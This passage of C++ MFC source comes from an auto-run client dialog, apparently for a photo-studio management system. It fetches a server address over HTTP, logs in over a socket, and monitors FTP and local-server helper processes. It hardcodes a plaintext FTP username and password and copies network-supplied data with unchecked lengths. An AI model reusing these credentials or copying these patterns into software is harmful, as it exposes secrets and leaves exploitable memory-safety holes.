  700. return OnConnect3();
  701. }
  702. if (pFile)
  703. {
  704. CStdioFile csf;
  705. csf.Open(m_strTempDir + "\\ip.txt", CFile::modeCreate | CFile::modeWrite | CFile::typeBinary);
  706. char buf[2048];
  707. int n;
  708. while ((n = pFile->Read(buf, 2048)) > 0)
  709. csf.Write(buf, n);
  710. csf.Close();
  711. pFile->Close();
  712. }
  713. CStdioFile fp;
  714. fp.Open(m_strTempDir + "\\ip.txt", CFile::modeRead);
  715. fp.ReadString(g_server);
  716. fp.Close();
  717. CString strServerAddress = g_server;
  718. char *szServerAddress = strServerAddress.GetBuffer(0);
  719. strServerAddress.ReleaseBuffer();
  720. /*for Client, IP and Port can be 0,
  721. and for Server, IP is LocalIP, and Port is Listening Port*/
  722. int nResult = m_tClientTunnel.net_OpenSocket(Transport_Client,
  723. 0,
  724. HandleClientNetEvent,
  725. this);
  726. if (TRANSPORT_OK != nResult)
  727. {
  728. return 0;
  729. }
  730. DWORD dwRemoteIPValue = inet_addr(szServerAddress);
  731. WORD wPort = GetPort();
  732. nResult = m_tClientTunnel.net_Connect(dwRemoteIPValue, wPort);
  733. if (TRANSPORT_OK != nResult)
  734. {
  735. m_tClientTunnel.net_CloseSocket();
  736. return OnConnect3();
  737. }
  738. return ProcessLoginRequest();
  739. }
  740. BOOL CAutoRunDlg::OnConnect3() // Jeff:地址无效,废弃函数;
  741. {
  742. g_nSrvType = 3;
  743. CString server = "http://photo.bjlyfz.com/download/ip.txt";
  744. char buf[MAX_PATH];
  745. ::GetTempPath(sizeof(buf), buf);
  746. CString m_strTempDir = buf;
  747. DWORD m_dwHttpRequestFlags = HSR_DOWNLOAD | INTERNET_FLAG_EXISTING_CONNECT | INTERNET_FLAG_NO_AUTO_REDIRECT;
  748. INTERNET_PORT m_dwPort;
  749. DWORD dwType;
  750. CInternetSession m_cis;
  751. CHttpConnection *m_pHttp;
  752. CString m_strServer;
  753. CString m_strIniPath;
  754. AfxParseURL(server, dwType, m_strServer, m_strIniPath, m_dwPort);
  755. if (dwType != AFX_INET_SERVICE_HTTP)
  756. {
  757. return FALSE;
  758. }
  759. m_cis.SetOption(INTERNET_OPTION_CONNECT_TIMEOUT, 5);
  760. m_pHttp = m_cis.GetHttpConnection(m_strServer, m_dwPort);
  761. try
  762. {
  763. m_pHttp = m_cis.GetHttpConnection(m_strServer, m_dwPort);
  764. }
  765. catch (CInternetException* pEx)
  766. {
  767. return false;
  768. }
  769. CHttpFile *pFile = m_pHttp->OpenRequest(CHttpConnection::HTTP_VERB_GET,
  770. m_strIniPath, NULL, 1, NULL, NULL, m_dwHttpRequestFlags);
  771. try
  772. {
  773. pFile->SendRequest();
  774. }
  775. catch (CInternetException* pEx)
  776. {
  777. pFile->Close();
  778. return false;
  779. }
  780. if (pFile)
  781. {
  782. CStdioFile csf;
  783. csf.Open(m_strTempDir + "\\ip.txt", CFile::modeCreate | CFile::modeWrite | CFile::typeBinary);
  784. char buf[2048];
  785. int n;
  786. while ((n = pFile->Read(buf, 2048)) > 0)
  787. csf.Write(buf, n);
  788. csf.Close();
  789. pFile->Close();
  790. }
  791. CStdioFile fp;
  792. fp.Open(m_strTempDir + "\\ip.txt", CFile::modeRead);
  793. fp.ReadString(g_server);
  794. fp.Close();
  795. CString strServerAddress = g_server;
  796. char *szServerAddress = strServerAddress.GetBuffer(0);
  797. strServerAddress.ReleaseBuffer();
  798. /*for Client, IP and Port can be 0,
  799. and for Server, IP is LocalIP, and Port is Listening Port*/
  800. int nResult = m_tClientTunnel.net_OpenSocket(Transport_Client,
  801. 0,
  802. HandleClientNetEvent,
  803. this);
  804. if (TRANSPORT_OK != nResult)
  805. {
  806. return 0;
  807. }
  808. DWORD dwRemoteIPValue = inet_addr(szServerAddress);
  809. WORD wPort = GetPort();
  810. nResult = m_tClientTunnel.net_Connect(dwRemoteIPValue, wPort);
  811. if (TRANSPORT_OK != nResult)
  812. {
  813. m_tClientTunnel.net_CloseSocket();
  814. return 0;
  815. }
  816. return ProcessLoginRequest();
  817. }
  818. void CAutoRunDlg::ProcessNetEvent(int nEventType, void *pRecvMsg, DWORD dwDataLen)
  819. {
  820. if (Transport_ReadEv == nEventType)
  821. {
  822. if (NULL == pRecvMsg) return;
  823. TMessageHeader* pHeader = (TMessageHeader *)pRecvMsg;
  824. char *pDataBuf = (char *)pRecvMsg + MESSAGE_HEADER_LEN;
  825. WORD dwMessageID = pHeader->wMessageId;
  826. switch (dwMessageID)
  827. {
  828. case MSG_LOGIN_RESP:
  829. case (MSG_LOGIN_RESP + 0X2FFF) :
  830. {
  831. LOGIN_RESULT_STRU tLoginResult = { 0 };
  832. memcpy(&tLoginResult, pDataBuf, sizeof(LOGIN_RESULT_STRU));
  833. ProcessLoginResponse(&tLoginResult);
  834. break;
  835. }
  836. case MSG_USERINFO_RESP:
  837. {
  838. TUSERLIST_INFO_STRU tUserListInfo = { 0 };
  839. memcpy(&tUserListInfo, pDataBuf, sizeof(TUSERLIST_INFO_STRU));
  840. // ProcessUserListInfoResponse(&tUserListInfo);
  841. break;
  842. }
  843. case MSG_LOGOUT_RESP:
  844. {
  845. TUSERLIST_INFO_STRU tUserListInfo = { 0 };
  846. memcpy(&tUserListInfo, pDataBuf, sizeof(TUSERLIST_INFO_STRU));
  847. // ProcessLogoutResponse(&tUserListInfo);
  848. break;
  849. }
  850. case MSG_CHATMESSAGE_RESP:
  851. case (MSG_CHATMESSAGE_RESP + 0X4FFF) :
  852. {
  853. TCHAT_MESSAGE_STRU *pChatMessage = (TCHAT_MESSAGE_STRU *)pDataBuf;
  854. ProcessChatMessageResponse((void *)pChatMessage);
  855. break;
  856. }
  857. default:
  858. {
  859. break;
  860. }
  861. }
  862. }
  863. else if (Transport_CloseEv == nEventType)
  864. {
  865. SetTimer(DISCONNECT_TIMER, 0, NULL);
  866. }
  867. ///////
  868. }
  869. void CAutoRunDlg::OnDisconnect()
  870. {
  871. m_tClientTunnel.net_CloseSocket();
  872. SetConnectionID(INVALID_SOCKET);
  873. }
  874. void CAutoRunDlg::ProcessLoginResponse(void *pLoginResult)
  875. {
  876. if (NULL == pLoginResult) return;
  877. LOGIN_RESULT_STRU *ptLoginResult = (LOGIN_RESULT_STRU *)pLoginResult;
  878. DWORD dwConnectionID = ptLoginResult->tCommonMsg.dwConnectionID;
  879. SetConnectionID(dwConnectionID);
  880. BYTE byResult = ptLoginResult->byResult;
  881. if (LOGIN_RESULT_SUC == byResult)
  882. {
  883. }
  884. else
  885. {
  886. SetTimer(LOGINFAILED_TIMER, 0, NULL);
  887. }
  888. CString strCommentInfo("");
  889. strCommentInfo.Format("%s. 用户代号: %ld",
  890. ((LOGIN_RESULT_SUC == byResult) ? "登录成功" :
  891. (LOGIN_RESULT_MULTI == byResult) ? "重复登录" :
  892. (LOGIN_RESULT_NAMERROR == byResult) ? "名字不存在" :
  893. (LOGIN_RESULT_PWERROR == byResult) ? "密码错误" : "登录失败"),
  894. dwConnectionID);
  895. // MessageBox((CString)strCommentInfo);
  896. }
  897. CString newGUID()
  898. {
  899. CString str;
  900. GUID guid;
  901. CoInitialize(NULL);
  902. if (S_OK == ::CoCreateGuid(&guid))
  903. {
  904. str.Format(
  905. "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}",
  906. guid.Data1,
  907. guid.Data2,
  908. guid.Data3,
  909. guid.Data4[0], guid.Data4[1],
  910. guid.Data4[2], guid.Data4[3],
  911. guid.Data4[4], guid.Data4[5],
  912. guid.Data4[6], guid.Data4[7]);
  913. }
  914. CoUninitialize();
  915. return str.Left(28);
  916. }
  917. BOOL CAutoRunDlg::ProcessLoginRequest()
  918. {
  919. WORD wMessageId = 0;
  920. if (g_nSrvType == 0)
  921. wMessageId = MSG_LOGIN_REQ + 0X1FFF;
  922. else
  923. wMessageId = MSG_LOGIN_REQ;
  924. TLOGIN_STRU tLogonInfo = { 0 };
  925. tLogonInfo.tCommonMsg.dwConnectionID = GetConnectionID();
  926. tLogonInfo.tCommonMsg.wMessageId = wMessageId;
  927. CString strUserName = newGUID();
  928. strUserName.TrimLeft();
  929. strUserName.TrimRight();
  930. strcpy(tLogonInfo.tUserInfo.szUserName, strUserName);
  931. DWORD dwDataLen = sizeof(TLOGIN_STRU);
  932. TMessageHeader tHeader = { 0 };
  933. tHeader.wMessageId = wMessageId;
  934. tHeader.dwDataLen = dwDataLen;
  935. unsigned long ulSendLen = m_tClientTunnel.net_Send(&tHeader, (void *)&tLogonInfo, dwDataLen);
  936. if (ulSendLen == SOCKET_ERROR)
  937. {
  938. return 0;
  939. }
  940. return 1;
  941. }
  942. //---------------------------------------------------------------------------
  943. void CAutoRunDlg::OnDestroy()
  944. {
  945. g_pMainWnd2->DestroyWindow();
  946. delete g_pMainWnd2;
  947. OnDisconnect();
  948. Transport_UnInit();
  949. CDialog::OnDestroy();
  950. }
  951. void CAutoRunDlg::OnTimer(UINT nIDEvent)
  952. {
  953. // TODO: Add your message handler code here and/or call default
  954. if (DISCONNECT_TIMER == nIDEvent)
  955. {
  956. KillTimer(nIDEvent);
  957. OnDisconnect();
  958. }
  959. else if (LOGINFAILED_TIMER == nIDEvent)
  960. {
  961. KillTimer(nIDEvent);
  962. OnDisconnect();
  963. }
  964. else if (1 == nIDEvent)
  965. {
  966. KillTimer(1);
  967. m_bTerminate = false;
  968. m_bRunning = false;
  969. m_hThread = NULL;
  970. m_bRunning = true;
  971. m_hThread = (HANDLE)_beginthreadex(NULL, 0, SendMsgThread, (LPVOID)this, 0/* CREATE_SUSPENDED*/, &m_dwThreadID);
  972. }
  973. else if (2 == nIDEvent)
  974. {
  975. #if 0 // 停止关闭CPhotoFTPSend
  976. DWORD id = FindAppProcessID("CPhotoFTPSend.exe");
  977. if (id != -1)
  978. {
  979. TRACE("\n---------------------SetTimer(2) 定时关闭-------------------------\n");
  980. HANDLE ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);
  981. if (ProcessHandle)TerminateProcess(ProcessHandle, 0);
  982. }
  983. ShellExecute(NULL, _T("open"), g_mainpath2 + "\\CPhotoFTPSend.exe", NULL, NULL, SW_SHOWNORMAL);
  984. #endif
  985. }
  986. else if (3 == nIDEvent)
  987. {
  988. CloseAllErrorWnd();
  989. if (m_bRunning == 0)
  990. {
  991. m_bTerminate = false;
  992. m_bRunning = false;
  993. m_hThread = NULL;
  994. m_bRunning = true;
  995. m_hThread = (HANDLE)_beginthreadex(NULL, 0, SendMsgThread, (LPVOID)this, 0/* CREATE_SUSPENDED*/, &m_dwThreadID);
  996. }
  997. }
  998. else if (4 == nIDEvent)
  999. {
  1000. KillTimer(4);
  1001. TestFTP();
  1002. SetTimer(4, 60000, NULL);
  1003. }
  1004. else if (5 == nIDEvent)
  1005. {
  1006. KillTimer(5);
  1007. TestFTPSend();
  1008. SetTimer(5, 10000, NULL);
  1009. }
  1010. else if (6 == nIDEvent)
  1011. {
  1012. // 测试连接本地服务器;
  1013. Test_Connect_LocalServer();
  1014. }
  1015. }
  1016. void CAutoRunDlg::OnClose()
  1017. {
  1018. // TODO: Add your command handler code here settimer
  1019. TerminateThread();
  1020. CDialog::OnCancel();
  1021. }
  1022. BOOL CAutoRunDlg::TerminateThread()
  1023. {
  1024. try
  1025. {
  1026. if (!m_bRunning)
  1027. return TRUE;
  1028. m_bTerminate = true;
  1029. for (;;)
  1030. {
  1031. if (::WaitForSingleObject(m_hThread, 0) == WAIT_OBJECT_0)
  1032. break;
  1033. MSG msg;
  1034. while (::PeekMessage(&msg, NULL, 0, 0, PM_NOREMOVE))
  1035. {
  1036. if (!AfxGetApp()->PumpMessage())
  1037. break;
  1038. }
  1039. }
  1040. ::CloseHandle(m_hThread);
  1041. m_bRunning = false;
  1042. return TRUE;
  1043. }
  1044. catch (...)
  1045. {
  1046. }
  1047. }
  1048. CArray<CStringArray, CStringArray>g_List1array;
  1049. DWORD g_nLeng = 0;
  1050. BYTE *g_pData = NULL;
  1051. CString g_str = "";
  1052. void CAutoRunDlg::ProcessChatMessageResponse(void *pResponse)
  1053. {
  1054. if (NULL == pResponse) return;
  1055. g_str = "";
  1056. TCHAT_MESSAGE_STRU *pChatMessage = (TCHAT_MESSAGE_STRU *)pResponse;
  1057. int nMessageLen = pChatMessage->wMessageLen;
  1058. DWORD dwToUserID = pChatMessage->dwToUserID;
  1059. char *pStr = new char[nMessageLen + 1];
  1060. memset(pStr, 0, nMessageLen + 1);
  1061. memcpy(pStr, pChatMessage->byFileContent, nMessageLen);
  1062. CString str = pStr;
  1063. delete[]pStr;
  1064. if (str == "账户或密码错误!")
  1065. {
  1066. g_bSendOK = 0;
  1067. }
  1068. else
  1069. {
  1070. if (dwToUserID == 0 && str != "发送信息成功!")
  1071. g_bSendOK = 0;
  1072. else
  1073. g_bSendOK = 1;
  1074. }
  1075. g_str = str;
  1076. g_bReturned = 1;
  1077. }
  1078. int CAutoRunDlg::GetPort()
  1079. {
  1080. static int aaa = -1;
  1081. if (aaa == -1)
  1082. {
  1083. aaa = CTime::GetCurrentTime().GetSecond() % 7;
  1084. }
  1085. aaa++;
  1086. if (aaa >= 7)aaa = 0;
  1087. return 8387 + aaa;
  1088. }
  1089. void CAutoRunDlg::TestFTP()
  1090. {
  1091. try
  1092. {
  1093. DWORD id = FindAppProcessID("CPhotoFTPReceive.exe");
  1094. if (id != -1)
  1095. {
  1096. char server[50];
  1097. DWORD leng = 50;
  1098. ::GetComputerName(server, &leng);
  1099. CString ip = server;
  1100. MyGetIPByName(ip);
  1101. CFTPSend *pftp = new CFTPSend;
  1102. if (!pftp->LogOnToServer(ip, 21, "photo1account", "lyfzphoto1account"))
  1103. {
  1104. delete pftp; pftp = NULL;
  1105. HANDLE ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);
  1106. if (ProcessHandle)TerminateProcess(ProcessHandle, 0); ::Sleep(3000);
  1107. ShellExecute(NULL, _T("open"), g_mainpath2 + "\\CPhotoFTPReceive.exe", NULL, NULL, SW_SHOWNORMAL);
  1108. return;
  1109. }
  1110. int ret;
  1111. CString filename, filepath;
  1112. if (::PathFileExists(g_mainpath2 + "\\test.dat") == 0)
  1113. {
  1114. CFile fp;
  1115. fp.Open(g_mainpath2 + "\\test.dat", CFile::modeCreate | CFile::modeWrite);
  1116. char aa[500];
  1117. fp.Write(aa, 500);
  1118. fp.Close();
  1119. }
  1120. filepath = g_mainpath2 + "\\test.dat";
  1121. filename = filepath.Right(filepath.GetLength() - filepath.ReverseFind('\\') - 1);
  1122. ret = pftp->MoveFile(filename, filepath, 0);
  1123. if (ret != 1)
  1124. { // AfxMessageBox("失败2");
  1125. delete pftp; pftp = NULL;
  1126. HANDLE ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);
  1127. if (ProcessHandle)TerminateProcess(ProcessHandle, 0);
  1128. ::Sleep(3000);
  1129. ShellExecute(NULL, _T("open"), g_mainpath2 + "\\CPhotoFTPReceive.exe", NULL, NULL, SW_SHOWNORMAL);
  1130. return;
  1131. }
  1132. delete pftp; pftp = NULL;
  1133. }
  1134. }
  1135. catch (...)
  1136. {
  1137. }
  1138. }
  1139. void CAutoRunDlg::TestFTPSend()
  1140. {
  1141. try
  1142. {
  1143. ShellExecute(NULL, _T("open"), g_mainpath2 + "\\CPhotoFTPSend.exe", NULL, NULL, SW_SHOWNORMAL);
  1144. }
  1145. catch (...)
  1146. {
  1147. }
  1148. }
  1149. BOOL nNeedConn2 = 1;
  1150. int g_nFailTimes = 0;
  1151. void CAutoRunDlg::Test_Connect_LocalServer() // 连接DBServer.exe本地服务器;
  1152. {
  1153. g_nSrvType = 0;
  1154. try
  1155. {
  1156. CArray<CStringArray, CStringArray>Listarray1;
  1157. int i;
  1158. HWND hwnd = NULL;
  1159. hwnd = ::FindWindow(NULL, "影楼管理系统服务器");
  1160. if (hwnd == NULL)
  1161. ShellExecute(NULL, _T("open"), g_mainpath, NULL, NULL, SW_SHOWNORMAL);
  1162. if (nNeedConn2)
  1163. {
  1164. if (g_pMainWnd2->OnConnectLocalServer() == 0)
  1165. {
  1166. WriteLogin("连接本地服务器失败");
  1167. nNeedConn2 = 1;
  1168. HWND hwnd = NULL;
  1169. hwnd = ::FindWindow(NULL, "影楼管理系统服务器");
  1170. g_nFailTimes++;
  1171. #if 0 // 不关闭DBServer.exe;
  1172. if (g_nFailTimes > 10)
  1173. {
  1174. g_nFailTimes = 0;
  1175. DWORD id = FindAppProcessID("DBServer.exe");
  1176. if (id != -1)
  1177. {
  1178. HANDLE ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);
  1179. if (ProcessHandle)TerminateProcess(ProcessHandle, 0);
  1180. }
  1181. }
  1182. else if (g_nFailTimes > 5)
  1183. {
  1184. if (hwnd)
  1185. {
  1186. ::PostMessage(hwnd, g_wmClose, 2, NULL);
  1187. return;
  1188. }
  1189. }
  1190. #endif
  1191. return;
  1192. }
  1193. else
  1194. {
  1195. WriteLogin("连接本地服务器成功");
  1196. int aa = 100;
  1197. while (g_pMainWnd2->m_dwConnectionID == INVALID_SOCKET)
  1198. {
  1199. ::Sleep(50);
  1200. aa--;
  1201. if (aa == 0)break;
  1202. }
  1203. nNeedConn2 = 0;
  1204. }
  1205. }
  1206. // 向本地服务器请求域名;
  1207. g_sendhead.bsql = 0;
  1208. g_sendhead.code[0] = 183;
  1209. g_sendhead.tabcount = 1;
  1210. g_bReturned2 = 0;
  1211. g_pMainWnd2->ProcessChatMessageRequest2(1);
  1212. for (i = 0; i < 10; i++)
  1213. {
  1214. if (g_bReturned2)break;
  1215. ::Sleep(1000);
  1216. }
  1217. if (i >= 10)
  1218. {
  1219. WriteLogin("发送本地服务器失败");
  1220. nNeedConn2 = 1;
  1221. HWND hwnd = NULL;
  1222. hwnd = ::FindWindow(NULL, "影楼管理系统服务器");
  1223. g_nFailTimes++;
  1224. #if 0 // 不关闭DBServer.exe
  1225. if (g_nFailTimes > 10)
  1226. {
  1227. g_nFailTimes = 0;
  1228. DWORD id = FindAppProcessID("DBServer.exe");
  1229. if (id != -1)
  1230. {
  1231. HANDLE ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);
  1232. if (ProcessHandle)TerminateProcess(ProcessHandle, 0);
  1233. }
  1234. }
  1235. else if (g_nFailTimes > 5)
  1236. {
  1237. if (hwnd)
  1238. {
  1239. ::PostMessage(hwnd, g_wmClose, 2, NULL);
  1240. return;
  1241. }
  1242. }
  1243. #endif
  1244. return;
  1245. }
  1246. else
  1247. {
  1248. WriteLogin("发送本地服务器成功");
  1249. g_nFailTimes = 0;
  1250. }
  1251. DataToArray(&Listarray1);
  1252. g_domainstr = Listarray1.ElementAt(0).ElementAt(0);
  1253. Global::WriteTextLog(g_domainstr);
  1254. // g_pMainWnd2->OnDisconnect();
  1255. }
  1256. catch (...)
  1257. {
  1258. }
  1259. }